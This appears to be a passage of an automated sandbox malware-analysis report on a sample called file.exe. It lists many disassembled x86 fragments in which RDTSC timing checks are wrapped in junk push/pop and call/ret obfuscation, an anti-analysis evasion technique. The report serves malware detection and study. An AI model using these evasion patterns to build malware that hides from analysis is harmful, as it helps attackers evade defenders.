              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135C136 second address: 135C140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEA188A9BD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135C42E second address: 135C45F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEA188F2DB8h 0x00000008 jmp 00007FEA188F2DBCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jbe 00007FEA188F2DC2h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135C45F second address: 135C463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135C463 second address: 135C481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FEA188F2DC4h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135C481 second address: 135C487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135C783 second address: 135C78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135C78B second address: 135C7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 ja 00007FEA188A9BD6h 0x0000000c popad 0x0000000d jo 00007FEA188A9BE2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135C7A0 second address: 135C7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135FE66 second address: 135FE7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007FEA188A9BD6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135FED3 second address: 135FED9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 135FED9 second address: 135FEDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13601F5 second address: 13601F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136039D second address: 13603A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136048F second address: 1360493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1360493 second address: 1360497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1360A5D second address: 1360A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1360A61 second address: 1360A67 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1360B8C second address: 1360B91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1360CD1 second address: 1360CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEA188A9BD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1360CDB second address: 1360CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1360CDF second address: 1360CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FEA188A9BD8h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1361103 second address: 1361107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1361107 second address: 1361124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1362825 second address: 136282B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13651D2 second address: 13651E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188A9BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1368DDF second address: 1368DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1368DE3 second address: 1368DED instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEA188A9BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1368DED second address: 1368E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188F2DBAh 0x00000008 jbe 00007FEA188F2DB6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136A459 second address: 136A481 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jnc 00007FEA188A9BD6h 0x00000015 popad 0x00000016 jmp 00007FEA188A9BE2h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136AA9E second address: 136AAA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136AAA4 second address: 136AAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136BB1B second address: 136BB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136C9CD second address: 136CA37 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEA188A9BDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FEA188A9BE9h 0x00000012 add ebx, dword ptr [ebp+122D293Ch] 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b jmp 00007FEA188A9BDBh 0x00000020 popad 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FEA188A9BD8h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edi 0x00000042 pop edi 0x00000043 pop eax 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136D9C4 second address: 136D9C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136E803 second address: 136E826 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188A9BE5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13708D7 second address: 13708DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136BC63 second address: 136BC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136AC49 second address: 136AC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13708DB second address: 13708F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136DAEC second address: 136DAF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136AC4D second address: 136AC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13708F3 second address: 13708F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136E97B second address: 136E9A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push esi 0x0000000c jnp 00007FEA188A9BDCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136FA98 second address: 136FAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEA188F2DB6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DAF2 second address: 136DB04 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA188A9BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AC53 second address: 136AC59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13708F7 second address: 137091E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA188A9BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jnl 00007FEA188A9BD6h 0x00000014 jmp 00007FEA188A9BDEh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136FAAC second address: 136FAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DB04 second address: 136DB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137091E second address: 1370922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136E9A2 second address: 136EA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007FEA188A9BD8h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 0000001Dh 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 or ebx, dword ptr [ebp+122D2920h] 0x00000026 push dword ptr fs:[00000000h] 0x0000002d jnl 00007FEA188A9BDCh 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a mov dword ptr [ebp+122D2C54h], edx 0x00000040 mov eax, dword ptr [ebp+122D06A5h] 0x00000046 mov dword ptr [ebp+122D37A4h], ecx 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007FEA188A9BD8h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 00000014h 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 mov dword ptr [ebp+1247E6D6h], edx 0x0000006e pushad 0x0000006f mov ebx, edx 0x00000071 mov edx, 49357673h 0x00000076 popad 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007FEA188A9BE5h 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136FAB1 second address: 136FAB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DB08 second address: 136DB0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136FAB7 second address: 136FABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371866 second address: 137186C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DBC7 second address: 136DBE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137186C second address: 1371870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DBE5 second address: 136DBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373705 second address: 1373786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FEA188A9BD8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 call 00007FEA188A9BE1h 0x00000029 mov di, E112h 0x0000002d pop ebx 0x0000002e push 00000000h 0x00000030 movzx ebx, cx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FEA188A9BD8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f sub dword ptr [ebp+1245CC5Bh], esi 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 jne 00007FEA188A9BD6h 0x0000005f push ebx 0x00000060 pop ebx 0x00000061 popad 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373786 second address: 137378D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13757FC second address: 1375897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FEA188A9BD6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D2CD9h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FEA188A9BD8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 add dword ptr [ebp+1247D9BAh], edx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007FEA188A9BD8h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 jmp 00007FEA188A9BE6h 0x00000058 jmp 00007FEA188A9BE5h 0x0000005d mov bl, dh 0x0000005f xchg eax, esi 0x00000060 push eax 0x00000061 push edx 0x00000062 js 00007FEA188A9BDCh 0x00000068 jbe 00007FEA188A9BD6h 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375897 second address: 13758BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FEA188F2DB6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FEA188F2DC6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13767BC second address: 1376815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FEA188A9BD8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov bx, 2E3Eh 0x00000028 mov dword ptr [ebp+122D2BB9h], esi 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D2AD4h] 0x00000038 xchg eax, esi 0x00000039 push edi 0x0000003a jno 00007FEA188A9BDCh 0x00000040 pop edi 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jnp 00007FEA188A9BD6h 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373901 second address: 1373916 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA188F2DBCh 0x00000008 ja 00007FEA188F2DB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13748C2 second address: 137495C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FEA188A9BDBh 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr [ebp+122D240Bh], eax 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov di, ax 0x00000025 mov eax, dword ptr [ebp+122D07DDh] 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FEA188A9BD8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D280Dh] 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push ebx 0x00000050 call 00007FEA188A9BD8h 0x00000055 pop ebx 0x00000056 mov dword ptr [esp+04h], ebx 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc ebx 0x00000063 push ebx 0x00000064 ret 0x00000065 pop ebx 0x00000066 ret 0x00000067 pushad 0x00000068 push edx 0x00000069 pop ebx 0x0000006a add esi, 5868AA71h 0x00000070 popad 0x00000071 jmp 00007FEA188A9BDEh 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 jng 00007FEA188A9BD8h 0x0000007f push edi 0x00000080 pop edi 0x00000081 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137495C second address: 1374962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13739AD second address: 13739B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377695 second address: 13776A4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEA188F2DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13776A4 second address: 1377743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FEA188A9BE4h 0x0000000c nop 0x0000000d or ebx, dword ptr [ebp+122D2838h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FEA188A9BD8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f jc 00007FEA188A9BE5h 0x00000035 jmp 00007FEA188A9BDFh 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FEA188A9BD8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 jmp 00007FEA188A9BE8h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push esi 0x0000005f push edx 0x00000060 pop edx 0x00000061 pop esi 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1375ABB second address: 1375AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1378733 second address: 1378738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1378738 second address: 137873D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376A48 second address: 1376A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376A4E second address: 1376A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13779BB second address: 13779BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137972C second address: 13797E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007FEA188F2DDDh 0x00000010 nop 0x00000011 mov ebx, dword ptr [ebp+122D28C0h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FEA188F2DB8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 jng 00007FEA188F2DC4h 0x00000039 pushad 0x0000003a jg 00007FEA188F2DB6h 0x00000040 mov edi, dword ptr [ebp+122D2A04h] 0x00000046 popad 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007FEA188F2DB8h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000017h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 movzx ebx, cx 0x00000066 xchg eax, esi 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a jmp 00007FEA188F2DBFh 0x0000006f jng 00007FEA188F2DB6h 0x00000075 popad 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13797E8 second address: 13797EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
